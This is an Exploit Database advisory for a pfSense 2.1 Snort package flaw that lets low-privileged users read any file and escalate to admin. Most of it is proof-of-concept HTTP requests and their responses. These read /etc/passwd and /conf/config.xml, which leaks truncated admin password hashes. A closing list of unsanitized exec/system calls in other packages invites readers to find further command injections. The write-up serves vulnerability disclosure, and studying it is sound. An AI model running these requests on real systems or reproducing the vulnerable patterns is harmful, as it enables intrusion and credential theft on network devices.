pfSense 2.1 build 20130911-1816 – Directory Traversal

• Exploit Database
• 16 阅读

• 作者： @u0x
  日期： 2014-01-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31263/

• ######################################################################
  #_ ____ _______________
  #| | / _ \| \ | |/ ___|/ ___|/ \|_ _|
  #| || | | |\| | |_| | / _ \ | |
  #| |__| |_| | |\| |_| | |___ / ___ \| |
  #|_____\___/|_| \_|\____|\____/_/ \_\_|
  #
  # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
  users (LFI/RCE)
  # Date: 25/01/2014 (0-day)
  # Exploit Author: @u0x (Pichaya Morimoto)
  # Software Link: www.pfsense.org
  # Category: Local File Inclusion (LFI) & Privilege Escalation
  # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
  #
  #####################################################################
  
  
  
  pfSense firewall/router distribution description :
  
  ======================================================================
  
  pfSense is a free, open source customized distribution of FreeBSD tailored
  for use as a firewall and router. In addition to being a powerful, flexible
  firewalling and routing platform, it includes a long list of related
  features and a package system allowing further expandability without adding
  bloat and potential security vulnerabilities to the base distribution.
  pfSense is a popular project with more than 1 million downloads since its
  inception, and proven in countless installations ranging from small home
  networks protecting a PC and an Xbox to large corporations, universities
  and other organizations protecting thousands of network devices.
  
  This project started in 2004 as a fork of the m0n0wall project, but focused
  towards full PC installations rather than the embedded hardware focus of
  m0n0wall. pfSense also offers an embedded image for Compact Flash based
  installations, however it is not our primary focus.
  
  Attack Scenario
  
  ======================================================================
  
  Authenticated users with only permission to access some packages in web gui
  (a.k.a. webConfigurator) will be able to escalate themselves to other
  privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
  LFI), result in fully compromise the pfSense.
  
  This attack abuse the user privilege scheme with some of official packages
  (System > Package Manager)
  
  * Session Hijacking also possible to steal less privileged user sessions to
  perform this trickdue to "http" admin by default webConfigurator.
  
  Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
  Vulnerability
  
  Vulnerable file:
  
  ======================================================================
  
  snort_log_view.php
  
  [+] Checksum
  SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
  MD5: cd767e46a4e9e09ede7fd26560e37f14
  
  Vulnerable Source Code :
  ======================================================================
  http://www.pfsense.com/packages/config/snort/snort_log_view.php
  https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php
  
  …(deducted)...
  
  $contents = '';
  // Read the contents of the argument passed to us.
  // Is it a fully qualified path and file?
  
  if (file_exists($_GET['logfile']))
   $contents = file_get_contents($_GET['logfile']);
  // It is not something we can display, so print an error.
  else
   $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
  found!");
  $pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
  ?>
  
  …(deducted)...
  <textarea style="width:100%; height:100%;" readonly wrap="off" rows="33"
  cols="80" name="code2"><?=$contents;?>&lt;/textarea&gt;
  …(deducted)...
  
  
  
  Proof of Concept 1 : Arbitrary File Inclusion
  ======================================================================
  
  GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
  Host: firewall1.pentestlab1:1337
  Connection: keep-alive
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: th,en-US;q=0.8,en;q=0.6
  Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
  
  HTTP/1.1 200 OK
  Expires: Mon, 27 Jan 2014 07:25:10 GMT
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: max-age=180000
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
  pre-check=0
  Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
  X-Frame-Options: SAMEORIGIN
  Pragma: no-cache
  Content-type: text/html
  Transfer-Encoding: chunked
  Date: Sat, 25 Jan 2014 05:25:10 GMT
  Server: lighttpd/1.4.32
  
  …(deducted)...
  <td colspan="2" valign="top" class="label">
   <div style="background: #eeeeee; width:100%; height:100%;"
  id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag
  must be on the same line. -->
   <textarea style="width:100%; height:100%;" readonly wrap="off"
  rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
  toor:*:0:0:Bourne-again Superuser:/root:
  daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
  operator:*:2:5:System &:/:/usr/sbin/nologin
  …(deducted)...
  havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
  squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
  c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
  snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
  …(deducted)...
  
  Proof of Concept 2 : Directory Traversal
  # This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) +
  Lighttpd/1.4.32 on FreeBSD 8.3 x64
  ======================================================================
  
  GET /snort/snort_log_view.php?logfile=../ HTTP/1.1
  Host: firewall1.pentestlab1:1337
  Connection: keep-alive
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: th,en-US;q=0.8,en;q=0.6
  Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
  
  …(deducted)...
  ¬p.Z..­p firewall_rules_edit.php®p
  xmlrpc.php¯p
  wizard.php°p
  vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p
  vpn_pppoe.phpµp vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p
  vpn_openvpn_client.php¸p
  vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php»p
  vpn_ipsec_phase2.php¼p vpn_ipsec_phase1.php½p(vpn_ipsec_mobile.php¾p
  vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp
  vpn_ipsec.phpÁpuploadconfig.phpÂptreeview.cssÃpwizardsÏp
  tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,!
  …(deducted)...
  
  Proof of Concept 3 : Privilege Escalation
  # -rw-r--r--root wheel 30k Jan 25 11:35 config.xml
  ======================================================================
  
  GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1
  Host: firewall1.pentestlab1:1337
  Connection: keep-alive
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: th,en-US;q=0.8,en;q=0.6
  Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
  
  …(deducted)...
  <group>
   <name>office</name>
   <description><![CDATA[Main Office Employees]]></description>
   <member>2000</member>
   <gid>2000</gid>
   </group>
   <user>
   <name>admin</name>
   <descr><![CDATA[System Administrator]]></descr>
   <scope>system</scope>
   <groupname>admins</groupname>
   <password>$1$y8KiO3ow$mmMX4R0hE…(deducted)...</password>
   <uid>0</uid>
   <priv>user-shell-access</priv>
   <md5-hash>d4383b6f4c9fa…(deducted)...</md5-hash>
  <nt-hash>356239666432306265376131653…(deducted)...</nt-hash>
   </user>
  …(deducted)...
  
  P.S. There are many other ways to escalate from less-privileged users using
  official packages.
  For example, some OS command injections (Feel free to dig deeper than me..
  LoL)
  
  arping/arping.inc:38: system("arping -c3 " . $_POST['hostip']);
  tinc/tinc.inc:173:mwexec("/sbin/ifconfig
  {$realif} -group " . $a_ifgroups[$_GET['id']]['ifname']);
  spamd/spamd_db_ext.php:57:exec("echo {$_GET['action']} > /tmp/tmp");
  spamd/spamd_db.php:106: $status = exec("/usr/local/sbin/spamdb | grep
  \"{$_GET['getstatus']}\"");
  freeswitch_dev/v_profiles.tmp:38: exec("cp
  ".$v_conf_dir.".orig/sip_profiles/".$_GET['f']."
  ".$v_conf_dir."/sip_profiles/".$_GET['f']);
  freeswitch_dev/v_profiles.tmp:60: exec("rm
  ".$v_conf_dir."/sip_profiles/".$_GET['f']);
  snort-dev/snortsam-package-code/snort_new.inc:112:
  exec("/bin/ln -s
  /usr/local/etc/snort/snortDBrules/DB/{$_POST['ruledbname']}/rules
  {$pathToSnortDir}/{$newSnortDir}/rules");
  snort-dev/snortsam-package-code/snort_new.inc:129:
  $sidLinePosPre = exec('/usr/bin/sed -n /sid:' . $_POST['snortSidNum'] .
  '\;/= ' . $workingFile);
  
  # Special Thanks : Xelenonz, pistachio, pe3z and 2600 Thailand.
  # Video PoC (Thai version) : https://www.youtube.com/watch?v=dGwOUccGZnE